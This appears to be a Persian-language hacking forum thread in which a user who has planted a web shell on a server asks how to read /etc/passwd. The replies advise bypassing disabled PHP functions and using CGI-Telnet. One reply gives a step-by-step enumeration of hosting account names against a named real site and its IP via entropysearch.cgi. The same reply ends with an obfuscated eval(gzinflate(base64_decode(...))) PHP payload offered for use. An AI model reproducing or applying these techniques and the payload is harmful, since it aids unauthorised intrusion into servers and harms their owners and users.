SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Bypass etc/passwd

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Bypass etc/passwd

    سلام خدمت همگی

    دوستان من یک شل دارم

    safe mode =off

    وقتی میخوام این کامندو اجرا کنم .اجرا نمیشه

    cat /etc/passwd

    راه های بایپسشم انجام دادم دستور های مشابه به همینو وارد کردم اما جواب نگرفتم

    فایل های php که این دستور رو بایپس میکنه هم آپلود کردم بازم فایل های کانفیگ خونده نمیشن

    راه دیگه ای دارم؟

    ممنون
    به سلامتی اون پدری که هنگام تراشیدن موی کودک مبتلا به سرطانش گریه فرزندش رو دید ماشین رو داد به دستش و گفت:حالا نوبت ِ توئه … بتراش موهای منو
    برچسب ها: هیچ یک
  • #2
    RE: Bypass etc/passwd

    داداش منظورت اینه که یوزر ها خونده نمیشن یا کانفیگ؟
    [align=center]به دنبال ویلچری هستم برای روزگار !
    ظاهرا پایی برای راه آمدن با ما ندارد ...![/align]

    [align=center]My web:
    http://nabzeehsas.ir/[/align]

    نظر

    • #3
      RE: Bypass etc/passwd

      شما این دستور رو اجرا میکنید

      cat /etc/passwd

      یه سری کد میاد

      برای من نمیاد
      به سلامتی اون پدری که هنگام تراشیدن موی کودک مبتلا به سرطانش گریه فرزندش رو دید ماشین رو داد به دستش و گفت:حالا نوبت ِ توئه … بتراش موهای منو

      نظر

      • #4
        RE: Bypass etc/passwd

        Safe mod و Disable Funtion ها رو بای پس کن اگر باز هم نتیجه نگرفتی از اسکریپت زیر برای نمایش فایل Passwd استفاده کنید :

        http://iranhack.com/acc/thread-1209.html
        [align=center][/align]

        نظر

        • #5
          RE: Bypass etc/passwd

          با سلام
          دوست عزیز Off بودن Safe Mode دلیلی نمیشه که کامند هم اجرا بشه.
          شما ابتدا باید فانکشن ها رو غیر فعال کنید چون تمامی کامندهایی که شما در شلر اجرا میکنید از طریق همین توابع هست که سرور ممکنه اونهارو غیرفعال کرده باشه.
          از CGI-Telnet هم میتونید استفاده کنید.
           
          [align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)

          همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
           

          نظر

          • #6
            RE: Bypass etc/passwd

            بایپس passwd نباید زیاد مشکل باشه ولی اگه به هر دلیلی نشد
            شما می تونی یوزر های سایت رو از یه راه دیگه هم به دست بیاری
            یه مثال می زنم
            مثلا سایت tonel.org
            اول یه ping می گیری آی پی اومد: 144.76.66.252
            حالا یه nslookup می گیری (دستور nslookup 144.76.66.252 ) : جواب اومد

            Server: UnKnown
            Address: x.x.x.x

            Name: apwebhost.com
            Address: 144.76.66.252

            آدرس بالایی که ماله isp خودتونه ولی دومی رو لازمش داریم
            حالا میریم به apwebhost.com
            و جلوش این کدرو می زنیم
            cgi-sys/entropysearch.cgi?user=user
            میشه این
            http://apwebhost.com/cgi-sys/entropysearch.cgi?user=tonel
            جواب اومد
            Could not chdir into /.htmltemplates: No such file or directory
            یعنی یوزر صحیح نیست
            حالا میزنیم
            http://apwebhost.com/cgi-sys/entropysearch.cgi?user=tonelorg
            جواب اومد
            Could not chdir into /home/tonelorg/.htmltemplates: No such file or directory

            این یعنی این یوزر وجود داره
            ==========================================
            کد زیر هم تو eval جواب میده

            کد:
            eval(gzinflate(base64_decode('NYzbCoJAEIavd2HfYRIvPERKF0FY0BP0AhVhNrmDpqJrJuG7N2oNzOmfb/7A85QEDw5xa3RZw+l4Sdseuc1yUlZ9Tak2sA7D7agFSippE+whjJTsNOUIDu872IQcLnyUFHZOBTJSlQ29rymaqmvpzpjLP4Ie4CzwWZnemUB3fhI/s5waw5YZ9kuwX7nLPhgn+s9OqMBEl+N1ZZ0LK5qkW41xNo0DF04QNvk+K8MX')));

            نظر

            قبلی template بعدی
            صبر کنید ..
            X